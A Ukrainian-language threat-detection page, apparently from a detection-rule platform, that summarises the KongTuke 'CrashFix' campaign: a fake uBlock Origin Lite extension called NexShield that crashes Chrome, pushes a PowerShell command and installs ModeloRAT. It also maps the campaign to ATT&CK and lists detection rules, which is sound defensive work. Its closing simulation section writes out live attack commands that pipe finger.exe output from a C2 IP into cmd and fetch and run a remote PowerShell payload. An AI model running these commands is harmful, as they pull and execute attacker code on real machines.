Стежити
Резюме
KongTuke розповсюджував шкідливе розширення Chrome, NexShield, яке імітує uBlock Origin Lite. Після встановлення воно відображає попередження безпеки “CrashFix”, щоб змоделювати справжній інцидент безпеки браузера, викликає збій браузера і змушує користувача виконати шкідливу команду PowerShell, скопійовану в буфер обміну. Кампанія розгортає Python RAT, ModeloRAT, на системах, підключених до домену, і кількаетапну ланцюжок PowerShell на автономних хостах.
Розслідування
Аналітики Huntress переглянули код розширення, пов’язали командно-контрольний центр з nexsnield.com і зворотно зняли завантажені корисні навантаження. Вони спостерігали зловживання finger.exe як LOLBin для отримання інструкцій від зловмисника, а також DGA, який генерує домени .top. У середовищах на домені дослідники ідентифікували зашифрований за допомогою RC4 Python-імплантат, що зберігається через ключ HKCU Run. Додаткові методи включали обійти AMSI, і тактики виснаження ресурсів, призначені для тиску на користувачів з метою швидкого повного дотримання.
Захист
Блокуйте ID розширення Chrome і стежте за невідомими розширеннями, які видають себе за популярні блокувальники реклами. Виявляйте підключення до nexsnield.com, IP-адрес C2 і доменів, створених DGA. Використовуйте контроль виконання для обмеження використання LOLBin (включаючи finger.exe) і попереджайте про підозрілі значення ключів Run, особливо ті, що схожі на широко використовуване програмне забезпечення.
Відповідь
Попереджайте про встановлення розширень, пов’язаних з NexShield, і співвідносіть із зовнішніми з’єднаннями до виявленої інфраструктури C2 і DGA. Ізолюйте уражені хости та збирайте артефакти розширення, ключі реєстру Run, заплановані завдання та вилучені файли. Видаліть персистентність ModeloRAT, знищіть компоненти PowerShell-етапу, та відновіть і перевірте кінцеву точку.
graph TB %% Class definitions classDef action fill:#FFEEAA classDef tool fill:#99CCFF classDef malware fill:#FF9999 classDef process fill:#CCFFCC classDef persistence fill:#D9D9D9 classDef operator fill:#FFCC66 %% Nodes content_injection[“<b>Дія</b> – <b>T1659 Інʼєкція контенту</b><br/>Шкідлива реклама перенаправляє жертву на фальшиву сторінку Chrome Web Store із пропозицією встановити шкідливе розширення”] class content_injection action software_extension[“<b>Дія</b> – <b>T1176 Програмні розширення</b><br/>У браузер встановлюється шкідливе розширення, що маскується під uBlock Origin Lite”] class software_extension action extension_nexshield[“<b>Інструмент</b> – <b>Назва</b>: NexShield (шкідливе розширення Chrome)<br/><b>Опис</b>: Забезпечує стійкість та виконує подальшу шкідливу логіку”] class extension_nexshield tool user_execution[“<b>Дія</b> – <b>T1204.004 Виконання користувачем</b><br/>Розширення копіює команду PowerShell у буфер обміну, після чого жертва запускає її через Win+R”] class user_execution action powershell_process[“<b>Процес</b> – <b>T1059.001 PowerShell</b><br/>Виконує команду PowerShell, яка завантажує додаткові корисні навантаження”] class powershell_process process cmd_process[“<b>Процес</b> – <b>T1059.003 Командна оболонка Windows</b><br/>PowerShell викликає cmd.exe для виконання наступних етапів”] class cmd_process process sandbox_evasion[“<b>Дія</b> – <b>T1497.002 Ухилення від віртуалізації / пісочниці</b><br/>Корисне навантаження виконує розширені перевірки VM, пісочниць та інструментів аналізу”] class sandbox_evasion action dos_exhaustion[“<b>Дія</b> – <b>T1499.003 Відмова в обслуговуванні кінцевої точки</b><br/>Створює мільярди портів середовища виконання Chrome для виснаження CPU та памʼяті, що спричиняє збій браузера”] class dos_exhaustion action event_trigger[“<b>Дія</b> – <b>T1546 Виконання, ініційоване подією</b><br/>Використовує Chrome Alarms API для затримки шкідливих дій на 60 хвилин та повторення кожні 10 хвилин”] class event_trigger action dead_drop[“<b>Дія</b> – <b>T1102.001 Dead Drop Resolver веб-сервісу</b><br/>Звертається до динамічно згенерованих DGA-доменів для отримання наступних етапів”] class dead_drop action dga_resolution[“<b>Дія</b> – <b>T1568 Динамічне визначення адрес</b><br/>Алгоритм генерації доменів створює домени, що змінюються щотижня, для C2”] class dga_resolution action bidirectional_comm[“<b>Дія</b> – <b>T1102.002 Двонапрямна комунікація через веб-сервіси</b><br/>ModeloRAT обмінюється зашифрованими командами та відповідями через HTTP”] class bidirectional_comm action oneway_comm[“<b>Дія</b> – <b>T1102.003 Односпрямована комунікація через веб-сервіси</b><br/>Надсилає телеметрію та дані інсталяції/оновлення на сервер під контролем зловмисника”] class oneway_comm action encrypted_rc4[“<b>Дія</b> – <b>T1573.001 Зашифрований канал</b><br/>Трафік C2 зашифрований симетричним алгоритмом RC4”] class encrypted_rc4 action obfuscation[“<b>Дія</b> – <b>T1027 Обфусковані файли або інформація</b><br/>Корисні навантаження багатошарово зашифровані за допомогою Base64, XOR та AES”] class obfuscation action stripped_payload[“<b>Дія</b> – <b>T1027.008 Очищені корисні навантаження</b><br/>Корисні навантаження очищені та закодовані для ускладнення аналізу”] class stripped_payload action embedded_payload[“<b>Дія</b> – <b>T1027.009 Вбудовані корисні навантаження</b><br/>Зашифровані корисні навантаження завантажуються безпосередньо в памʼять”] class embedded_payload action appcert_dll[“<b>Дія</b> – <b>T1546.009 Виконання, ініційоване подією: AppCert DLL</b><br/>DoS-цикл використовує порти середовища виконання Chrome, аналогічно техніці AppCert DLL”] class appcert_dll action remote_access_tool[“<b>Шкідливе ПЗ</b> – <b>T1219 Засоби віддаленого доступу</b><br/>ModeloRAT забезпечує повні можливості віддаленого доступу”] class remote_access_tool malware persistence_run[“<b>Дія</b> – <b>T1554 Компрометація бінарного файлу ПЗ хоста</b><br/>Запис HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run запускає pythonw.exe для забезпечення стійкості”] class persistence_run persistence exec_guardrail[“<b>Дія</b> – <b>T1480.002 Обмеження виконання</b><br/>Перевіряє попереднє виконання через UUID-маяки для запобігання повторному зараженню”] class exec_guardrail action %% Edges content_injection –>|leads_to| software_extension software_extension –>|installs| extension_nexshield extension_nexshield –>|provides_persistence| persistence_run extension_nexshield –>|copies_command| user_execution user_execution –>|triggers| powershell_process powershell_process –>|launches| cmd_process powershell_process –>|performs| sandbox_evasion sandbox_evasion –>|allows| powershell_process powershell_process –>|creates| dos_exhaustion dos_exhaustion –>|uses| appcert_dll extension_nexshield –>|sets| event_trigger event_trigger –>|delays| powershell_process powershell_process –>|contacts| dead_drop dead_drop –>|uses| dga_resolution dga_resolution –>|provides| bidirectional_comm bidirectional_comm –>|encrypts_with| encrypted_rc4 bidirectional_comm –>|exchanges_with| remote_access_tool oneway_comm –>|sends_to| encrypted_rc4 powershell_process –>|obfuscates_using| obfuscation obfuscation –>|includes| stripped_payload obfuscation –>|includes| embedded_payload remote_access_tool –>|communicates_via| bidirectional_comm remote_access_tool –>|sends_telemetry| oneway_comm persistence_run –>|creates| exec_guardrail exec_guardrail –>|prevents| persistence_run
Потік Атаки
Детекції
Виклик підозрілих методів .NET із Powershell (через powershell)
Переглянути
Підозріле використання CURL (через cmdline)
Переглянути
Коротка назва файлу (через cmdline)
Переглянути
Можливе ручне або сценарійоване виконання в незвичайних папках (через cmdline)
Переглянути
Підозрілі рядки Powershell (через powershell)
Переглянути
Виклик підозрілих функцій Windows API з Powershell (через powershell)
Переглянути
Можливі точки постійності [ASEPs – Software/NTUSER Hive] (через registry_event)
Переглянути
Архів був розпакований у підозрілу директорію за допомогою Powershell (через powershell)
Переглянути
Виконання Python з підозрілих папок (через cmdline)
Переглянути
Можливі індикатори обфускації Powershell (через powershell)
Переглянути
Можливе системне перерахування (через cmdline)
Переглянути
Завантаження або вивантаження через Powershell (через cmdline)
Переглянути
IOCs (SourceIP) для виявлення: Аналіз CrashFix: Нова іграшка KongTuke
Переглянути
IOCs (HashSha256) для виявлення: Аналіз CrashFix: Нова іграшка KongTuke
Переглянути
IOCs (DestinationIP) для виявлення: Аналіз CrashFix: Нова іграшка KongTuke
Переглянути
IOCs (Emails) для виявлення: Аналіз CrashFix: Нова іграшка KongTuke
Переглянути
Виявлення виконання шкідливих команд KongTuke CrashFix [Windows Process Creation]
Переглянути
Виявлення обходу AMSI та видалення слідів за допомогою PowerShell [Windows Powershell]
Переглянути
Виконання симуляції
Передумови: Телеметрія та перевірка бази повинні пройти.
Обґрунтування: У цьому розділі детально описується точне виконання техніки противника (TTP), призначене для спрацьовування правила виявлення. Команди та опис ОБОВ’ЯЗКОВО повинні прямо відображати певні TTP та мають на меті створення саме тієї телеметрії, яку очікує логіка виявлення.
-
Розповідь про атаку та команди:
Зловмисник спочатку копіює легітимнийfinger.exeбінарний файл у тимчасову папку, перейменовуючи його наct.exe, а потім використовує вкладенийcmd /cланцюг, щоб викликати скопійований бінарний файл із підробленим аргументом, що контактує з віддаленим C2-сервером (199.217.98.108). Бінарний файл передає корисне навантаження назад у командний рядок, яке потім передається в другий прихованийcmdщо виконує отриманий код. Після цього зловмисник використовує PowerShell для завантаження вторинного корисного навантаження за допомогоюInvoke‑WebRequestі негайно виконує це за допомогоюiex. Усі кроки виконуються з мінімальним UI (/min) щоб уникнути виявлення користувачем.1. Копіювати finger.exe → %TEMP%ct.exe 2. Запустити: cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd" 3. Завантаження PowerShell і виконання вторинного корисного навантаження: powershell -NoProfile -WindowStyle Hidden -Command "iex (Invoke-WebRequest -Uri 'http://199.217.98.108/payload.ps1' -UseBasicParsing).Content" -
Скрипт регресійного тесту: Нижченаведений скрипт відтворює повний ланцюжок атаки на тестовій машині Windows. Виконайте його в підвищеній Powershell сесії.
#------------------------------------------------- # Виконання шкідливих команд KongTuke CrashFix #------------------------------------------------- # 1. Розгорніть LOLBin (finger.exe) у %TEMP% як ct.exe $fingerPath = "$env:windirsystem32finger.exe" $tempExe = "$env:TEMPct.exe" Copy-Item -Path $fingerPath -Destination $tempExe -Force # 2. Виконання шкідливого cmd-ланцюга (відповідає правилу Sigma) $maliciousCmd = 'cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd"' Start-Process -FilePath "cmd.exe" -ArgumentList "/c $maliciousCmd" -WindowStyle Hidden # 3. Завантаження та виконання вторинного корисного навантаження через PowerShell $payloadUrl = 'http://199.217.98.108/payload.ps1' $psCommand = "iex (Invoke-WebRequest -Uri `'$payloadUrl`' -UseBasicParsing).Content" Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `$psCommand`" -WindowStyle Hidden #------------------------------------------------- -
Команди очищення: Віджаліть залишки і зупиніть усі процеси, що залишилися після тесту.
# Видалити скопійований ct.exe Remove-Item -Path "$env:TEMPct.exe" -ErrorAction SilentlyContinue # Завершити будь-які зайві процеси cmd.exe або powershell.exe, започатковані тестом (фільтрація за конкретною командною лінією) Get-WmiObject Win32_Process | Where-Object { $_.CommandLine -match 'finger.exe|199.217.98.108' } | ForEach-Object { $_.Terminate() } # За бажанням: очистити Журнал подій, якщо це потрібно для повторюваності # wevlutil cl Security